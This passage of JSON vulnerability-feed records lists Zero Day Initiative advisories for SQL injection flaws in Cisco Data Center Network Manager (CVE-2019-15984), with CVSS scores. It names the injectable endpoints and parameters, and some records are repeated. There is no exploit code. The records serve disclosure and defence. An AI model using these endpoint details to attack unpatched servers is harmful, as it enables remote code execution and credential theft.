5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-034", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-034/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getHostEnclList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-065", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-065/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:07", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getN3KBufferStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getN3KBufferStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-092", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-092/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:39", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing a packet to the getHostEnclList SOAP endpoint, the process does not properly validate a user-supplied string for the sortType parameter before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-039", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-039/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:30", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/topdown/topology service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslListWithPM SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-054", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-054/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the filterStr parameter of the getLanEthernetStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanEthernetStatListES SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-080", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-080/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:28", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/inventory/zones service. When parsing the searchId parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getZoneListByZoneNameAndParentId SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-055", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-055/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:58", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the zones endpoint. When parsing the filterStr parameter in the getZoneDataLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getZoneDataLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-106", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-106/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:13", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the VpcWSService/VpcWS service. When parsing the fifth parameter of the getVpcConsistentList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllVpcs SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-081", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-081/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:04", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/settings/vxlan service. When parsing the fabricName parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager setVxlanProperties SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-096", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-096/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:55", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the detail endpoint. When parsing the serialNumber parameter in the getSwitchDbIdBySerialNumber method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSwitchDbIdBySerialNumber SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-110", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-110/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:20", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLengthES endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanStatEntities SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-069", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-069/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:50", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/smu/getjobs endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSMUTasks SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-019", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-019/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:42", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/licenses endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLicenses SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-031", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-031/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:45", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/health/getSyslogEventList endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSyslogEventList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-026", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-026/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:19", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getCpuStatDataLengthES endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanStatEntities SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-070", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-070/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing the sortType parameter of the getVmHostData endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getVmHostData SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", 